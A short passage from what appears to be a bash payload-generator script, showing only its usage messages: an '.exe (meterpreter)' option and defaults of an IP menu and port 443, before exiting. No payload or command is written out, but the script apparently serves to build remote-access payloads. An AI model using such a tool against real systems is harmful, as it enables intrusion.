[.${YELLOW}exe${RESET}] (meterpreter)" + echo -e " ${YELLOW}[i]${RESET} Missing will default to ${YELLOW}IP menu${RESET}" + echo -e " ${YELLOW}[i]${RESET} Missing will default to ${YELLOW}443${RESET}" exit 1 fi